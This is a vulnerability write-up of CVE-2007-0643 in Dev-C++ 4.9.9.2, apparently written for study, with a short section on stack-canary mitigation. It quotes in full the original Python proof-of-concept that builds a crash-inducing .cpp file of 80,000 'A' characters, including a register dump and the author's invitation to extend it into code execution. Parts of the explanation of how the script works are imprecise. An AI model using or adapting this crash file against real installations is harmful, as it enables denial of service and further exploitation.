Dev-C++ File Parsing Local Stack Overflow

CVE ID: 2007-0643

Vulnerability Description: "Stack-based buffer overflow in Bloodshed Dev-C++ 4.9.9.2 allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long line in a .cpp file." [nvd.nist.gov].

CVSS Score: 4.3 MEDIUM

Potential Impact: There is one known affected software configurations: 'cpe:2.3:a:bloodshed_software:dev-c\+\+:4.9.9.2:*:*:*:*:*:*:*'

Exploit ID: CVE-2007-0643

Conditions: This script in the vulnerability demonstrates a technique for causing a simple stack overflow in a program if the user has Bloodshed Dev-C++ 4.9.9.2

Language: Python -> C++

Type: DOS

 

----------------------------------------------------------------------------------------------------------------------

 

In the Bloodshed Dev-C++ vulnerability, the script that is parsed allows user-assisted remote attackers to possibly execute arbitrary code in a .cpp file as well as forcing a stack-based buffer overflow. The way that this works is quite simple.

See below:

```

#!/usr/bin/env python
print "--------------------------------------------------------------"
print "Dev-C++ 4.9.9.2 Stack Overflow"
print "url: http://www.bloodshed.net/"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "--------------------------------------------------------------"

try:
   char = "\x41" * 80000

   out_file = open('DevCpp.cpp','wb')
   out_file.write(char)
   out_file.close()

   print "File succesfully created!\n\n"
   print "Here is a dump:"
   print "----------------------------------------------------------------"
   print "pid=0A58 tid=04C4  EXCEPTION (first-chance)"
   print "----------------------------------------------------------------"
   print "Exception C00000FD (STACK_OVERFLOW)"
   print "----------------------------------------------------------------"
   print "EAX=00000674: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??"
   print "EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??"
   print "ECX=00404358: 8B 44 24 04 F7 40 04 06-00 00 00 0F 85 89 00 00"
   print "EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00"
   print "ESP=00032E1C: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00"
   print "EBP=000334A0: CC 34 03 00 7C 43 40 00-B0 34 03 00 BF 37 91 7C"
   print "ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??"
   print "EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??"
   print "EIP=7C8024E0: 53 56 57 8B 45 F8 89 65-E8 50 8B 45 FC C7 45 FC"
   print "              --> PUSH EBX"
   print
"----------------------------------------------------------------\n"
   print "Increasing the number of characters will change the results of"
   print "this exploit. For example try with 1000000 of characters and see"
   print "what happen."
   print "I was unable to execute arbitrary code but I think someone
better"
   print "than me can successfully exploit it :P\n"
except:
   print "Unable to create file!"

# milw0rm.com [2007-01-30]

```

What this code is basically doing is targeting the ASCII code '\x41', or the 'A' char, and overloading that with a string consisting of 80,000 A characters. This overflows that stack. It then opens a file named 'DevCpp.cpp' in 'wb' mode, or binary write mode - and then writes a large string to the file. This is a simple iteration of this technique, and this vulnerability is prone to cause a lot more harm than just this. In the file, the author writes, "I was unable to execute arbitrary code but I think someone better than me can successfully exploit it." This just means that it is definitely possible, the author simply couldn't figure it out.

 

According to [nvd.nist.gov], the vulnerability has been since modified, and is waiting reanalysis. This may change some information regarding this exploit. It is possible they figured out how to make it even more harmful. Though this exploit was for a now outdated program that had many issues, exploits like this still exist in many of our modern programs today. There are several ways that this has been mitigated on modern machines with current programs, but some of the logic still exists in a harmful way. For example, there are still programs that overflow memory stacks to crash the application. It might be in a different way that the way this script targeted - but it is still a common technique.

 

Something I have found that is a common fix to attacks like this are something called "Stack Canaries." Basically, you make a known value between the local variable and the return address on the stack. This way, the program can determine if the value has been altered so we can see if there is a buffer overflow attack in place. In GCC, this is a built in function. You can use the '-fstack-protector' or '-fstack-protector-strong' to enable stack canaries.

 

A great resource on this I have found is a post from [Stack Overflow] that illustrates the usage of Stack Canaries and the logic behind how it works.

 

This research can be applied due to the new understanding of how buffer overflows work on a lower level, and how easy it can be to take advantage of the stacks without proper mitigation strategies. If possible, developers should try to add stack canaries to mitigate this, and can also use other forms of data validation before allowing alteration of important memory data, ensuring that we have done something to prevent DOS attacks for our users.